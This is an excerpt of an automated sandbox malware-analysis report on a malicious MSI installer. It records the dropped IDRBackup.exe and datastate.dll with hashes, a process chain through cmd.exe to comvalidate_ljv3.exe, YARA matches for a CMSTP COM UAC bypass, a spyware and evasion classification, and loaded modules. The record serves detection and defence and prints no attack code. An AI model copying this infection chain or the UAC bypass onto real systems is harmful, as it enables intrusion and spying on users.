                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43437D810_2_00007FF6C43437D8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434486010_2_00007FF6C4344860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C436A86010_2_00007FF6C436A860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434087010_2_00007FF6C4340870
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433C87010_2_00007FF6C433C870
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C45700F010_2_00007FF6C45700F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434118010_2_00007FF6C4341180
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433F9A010_2_00007FF6C433F9A0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433917010_2_00007FF6C4339170
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43319FA10_2_00007FF6C43319FA
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4333A1010_2_00007FF6C4333A10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433E1C010_2_00007FF6C433E1C0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C441029010_2_00007FF6C4410290
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433F25010_2_00007FF6C433F250
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433FAF010_2_00007FF6C433FAF0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43412F010_2_00007FF6C43412F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434138C10_2_00007FF6C434138C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4332B8E10_2_00007FF6C4332B8E
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4338BB010_2_00007FF6C4338BB0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433C3B010_2_00007FF6C433C3B0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43443B010_2_00007FF6C43443B0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433534010_2_00007FF6C4335340
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43343F010_2_00007FF6C43343F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C456FCA010_2_00007FF6C456FCA0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4333C9010_2_00007FF6C4333C90
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433E49010_2_00007FF6C433E490
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C436A45010_2_00007FF6C436A450
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4332C5410_2_00007FF6C4332C54
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433FC7010_2_00007FF6C433FC70
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe 5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll 86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: String function: 00007FF6C4339170 appears 35 times
                      Source: comvalidate_ljv3.exe.7.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                      Source: wqosufsc.7.drStatic PE information: Number of sections : 12 > 10
                      Source: ikltbdky.19.drStatic PE information: Number of sections : 12 > 10
                      Source: sqlite3.dll.1.drStatic PE information: Number of sections : 18 > 10
                      Source: sqlite3.dll.2.drStatic PE information: Number of sections : 18 > 10
                      Source: 12.2.cmd.exe.30f07f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49afa00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.262baed.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c48acd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.50a76cd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.5061a00.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.25e6a20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49f56cd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.262c6ed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.50a6acd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c496cd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.26d7aed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.2692a20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49f4acd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c03a00.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.spyw.expl.evad.winMSI@21/48@1/1
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001D4C4 GetDiskFreeSpaceW,@System@@_llmul$qqrv,@System@@_llmul$qqrv,2_2_5001D4C4
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140008824 CoCreateInstance,#8,#9,#9,#9,#9,#9,#9,10_2_0000000140008824
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000C2EC GetModuleFileNameW,@System@LoadResourceModule$qqrpbo,2_2_5000C2EC
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML550.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFF582E36EF7EDD896.TMPJump to behavior
                      Source: Yara matchFile source: 2.2.IDRBackup.exe.50000000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl, type: DROPPED
                      Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: ONHQNHFT.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 88.31%
                      Source: ONHQNHFT.msiReversingLabs: Detection: 13%
                      Source: ONHQNHFT.msiVirustotal: Detection: 12%
                      Source: comvalidate_ljv3.exeString found in binary or memory: -install -runas
                      Source: comvalidate_ljv3.exeString found in binary or memory: -install
                      Source: comvalidate_ljv3.exeString found in binary or memory: -install -nolisense
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeProcess created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeProcess created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: datastate.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: datastate.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: profapi.dllJump to behavior
